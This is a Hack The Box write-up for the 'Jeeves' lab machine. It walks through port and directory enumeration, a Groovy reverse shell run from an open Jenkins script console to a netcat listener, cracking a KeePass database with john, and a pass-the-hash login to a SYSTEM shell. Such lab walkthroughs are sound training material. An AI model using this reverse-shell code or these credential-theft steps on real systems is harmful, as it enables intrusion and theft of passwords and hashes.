Hack The Box Jeeves Writeup

STEP 1.

danger@V2Geeks:~/Dropbox/00/hTB/jeeves$ nmap -sC -sV -oA initial 10.10.10.63
# Nmap 7.70 scan initiated Thu May 24 18:01:53 2018 as: nmap -sC -sV -oA initial 10.10.10.63
Nmap scan report for 10.10.10.63
Host is up (0.18s latency).
Not shown: 996 filtered ports
PORT      STATE SERVICE      VERSION
80/tcp    open  http         Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Ask Jeeves
135/tcp   open  msrpc        Microsoft Windows RPC
445/tcp   open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
50000/tcp open  http         Jetty 9.4.z-SNAPSHOT
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
|_http-title: Error 404 Not Found
Service Info: Host: JEEVES; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 5h00m00s, deviation: 0s, median: 4h59m59s
| smb-security-mode: 
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2018-05-24 23:02:50
|_  start_date: 2018-05-24 22:19:54

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu May 24 18:03:28 2018 -- 1 IP address (1 host up) scanned in 95.24 seconds



STEP 2: 
http://10.10.10.63    PORT: 80






STEP 3.
http://10.10.10.63:50000  PORT: 50000



STEP 4: gobuster on port 80

danger@V2Geeks:~$ gobuster -u http://10.10.10.63 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 15 -o 80.txt

Explanation: finding sub directory under root using dirbuster dictionery and thread value 15 

STEP 5: gobuster on port 50000


danger@V2Geeks:~$ gobuster -u http://10.10.10.63:50000 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 15 -o 50000.txt


STEPS 6: Important directories listed

         /askjeeves (Status: 302)
Lets try http://10.10.10.53/askjeeves/

                                          will show you dashboard
Steps 7:
Goto:  Dashboard->Manage Jenkins-->Script console
Explanation: Cleary here mention we can write groovy script here and run.

Step 8: Printing Helloworld message in groovy

cmd = " cmd.exe /c echo ''Hello World'' "

println cmd.execute().text




Step 9:  Getting initial Shell  
start listening on 8044 port using netcat

danger@V2Geeks:~/Dropbox/00/hTB/jeeves/www$ nc -nlvp 8044
listening on [any] 8044 ...


Step 10: start Initial Shell


Script Console


String host="10.10.14.191"; 
int port=8044; 
String cmd="cmd.exe"; 
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

Run

listening on [any] 8044 ...
10.10.10.63: inverse host lookup failed: Unknown host
connect to [10.10.14.191] from (UNKNOWN) [10.10.10.63] 49700
Microsoft Windows [Version 10.0.10586]
(c) 2015 Microsoft Corporation. All rights reserved.

C:\Users\Administrator\.jenkins>



C:\Users\Administrator\.jenkins>whoami
whoami
jeeves\kohsuke


C:\Users\Administrator\.jenkins>cd c:/users/kohsuke/Desktop



 Directory of c:\Users\kohsuke\Desktop dir

11/03/2017  11:19 PM    <DIR>          .
11/03/2017  11:19 PM    <DIR>          ..
11/03/2017  11:22 PM                32 user.txt
               1 File(s)             32 bytes
               2 Dir(s)   7,269,990,400 bytes free


c:\Users\kohsuke\Desktop>type users.txt
type users.txt
The system cannot find the file specified.

c:\Users\kohsuke\Desktop>type user.txt
type user.txt
e3232272596fb47950d59c4cf1e7066a


c:\Users\kohsuke\Documents>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is BE50-B1C9

 Directory of c:\Users\kohsuke\Documents

11/03/2017  11:18 PM    <DIR>          .
11/03/2017  11:18 PM    <DIR>          ..
09/18/2017  01:43 PM             2,846 CEH.kdbx
               1 File(s)          2,846 bytes
               2 Dir(s)   7,269,990,400 bytes free


To download CEH.kdbx lets first upload ncat.exe to windows machine

c:\Users\kohsuke\Documents>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is BE50-B1C9

 Directory of c:\Users\kohsuke\Documents

06/09/2018  09:14 PM    <DIR>          .
06/09/2018  09:14 PM    <DIR>          ..
09/18/2017  01:43 PM             2,846 CEH.kdbx
06/09/2018  09:15 PM         1,667,584 nc.exe
               2 File(s)      1,670,430 bytes
               2 Dir(s)   7,267,651,584 bytes free




To Download CEH.kdbx to linux machine using netcat

danger@kali:~$ ls -la CEH.kdbx
-rw-r--r-- 1 danger danger 2846 Jun  9 16:40 CEH.kdbx



danger@kali:~$ apt search keepass
Sorting... Done
Full Text Search... Done
keepass2/kali-rolling 2.38+dfsg-1 all
  Password manager

keepass2-doc/kali-rolling 2.38+dfsg-1 all
  Password manager - Documentation

keepassx/kali-rolling 2.0.3-1 amd64
  Cross Platform Password Manager

keepassxc/kali-rolling 2.3.1+dfsg.1-1 amd64
  Cross Platform Password Manager

kpcli/kali-rolling 3.1-3 all
  command line interface to KeePassX password manager databases

libfile-keepass-perl/kali-rolling 2.03-1 all
  interface to KeePass V1 and V2 database files



danger@kali:~$ keepass2john CEH.kdbx
CEH:$keepass$*2*6000*222*1af405cc00f979ddb9bb387c4594fcea2fd01a6a0757c000e1873f3c71941d3d*3869fe357ff2d7db1555cc668d1d606b1dfaf02b9dba2621cbe9ecb63c7a4091*393c97beafd8a820db9142a6a94f03f6*b73766b61e656351c3aca0282f1617511031f0156089b6c5647de4671972fcff*cb409dbc0fa660fcffa4f1cc89f728b68254db431a21ec33298b612fe647db48


It's we have to remove CEH:

Finla hash is 

$keepass$*2*6000*222*1af405cc00f979ddb9bb387c4594fcea2fd01a6a0757c000e1873f3c71941d3d*3869fe357ff2d7db1555cc668d1d606b1dfaf02b9dba2621cbe9ecb63c7a4091*393c97beafd8a820db9142a6a94f03f6*b73766b61e656351c3aca0282f1617511031f0156089b6c5647de4671972fcff*cb409dbc0fa660fcffa4f1cc89f728b68254db431a21ec33298b612fe647db48

Write it to blank file  CEHjohnable  and lets crack hash using johnthe ripper and rockyou dictionery



danger@kali:~$ sudo john --wordlist=/usr/share/wordlists/rockyou.txt CEHjohnableUsing default input encoding: UTF-8
Loaded 1 password hash (KeePass [SHA256 AES 32/64 OpenSSL])
Press 'q' or Ctrl-C to abort, almost any other key for status

Wait for 5 minute
  moonshine1       (?)
1g 0:00:00:55 DONE (2018-06-09 17:55) 0.01789g/s 983.9p/s 983.9c/s 983.9C/s moonshine1
Use the "--show" option to display all of the cracked passwords reliably
Session completed

moonshine1 is the password for CEH.kdbx


danger@kali:~$ apt-get install keepassx


danger@kali:~$ keepassx CEHjohnable 


Enter password and click ok







NTLM Hash found under Backup stuff



danger@kali:~$ pth-winexe --user=jeeves/administrator%aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00 --system //10.10.10.63 cmd.exe
E_md4hash wrapper called.
HASH PASS: Substituting user supplied NTLM HASH...
Microsoft Windows [Version 10.0.10586]
(c) 2015 Microsoft Corporation. All rights reserved.

C:\Windows\system32>


move to Desktop and list all content in 

c:\Users\Administrator\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is BE50-B1C9

 Directory of c:\Users\Administrator\Desktop

11/08/2017  10:05 AM    <DIR>          .
11/08/2017  10:05 AM    <DIR>          ..
12/24/2017  03:51 AM                36 hm.txt
11/08/2017  10:05 AM               797 Windows 10 Update Assistant.lnk
               2 File(s)            833 bytes
               2 Dir(s)   7,267,586,048 bytes free


c:\Users\Administrator\Desktop>type hm.txt
type hm.txt

The flag is elsewhere.  Look deeper.




c:\Users\Administrator\Desktop>dir /r /a:
dir /r /a:
 Volume in drive C has no label.
 Volume Serial Number is BE50-B1C9

 Directory of c:\Users\Administrator\Desktop

11/08/2017  10:05 AM    <DIR>          .
11/08/2017  10:05 AM    <DIR>          ..
11/03/2017  10:03 PM               282 desktop.ini
12/24/2017  03:51 AM                36 hm.txt
                                    34 hm.txt:root.txt:$DATA
11/08/2017  10:05 AM               797 Windows 10 Update Assistant.lnk
               3 File(s)          1,115 bytes

               2 Dir(s)   7,267,586,048 bytes free

Note: here hm.txt” had an ADS called “root.txt”



c:\Users\Administrator\Desktop>more < hm.txt:root.txt
more < hm.txt:root.txt

afbc5bd4b615a60648cec41c6ac92530


Hash Found !!!!!!!!!






Reactions: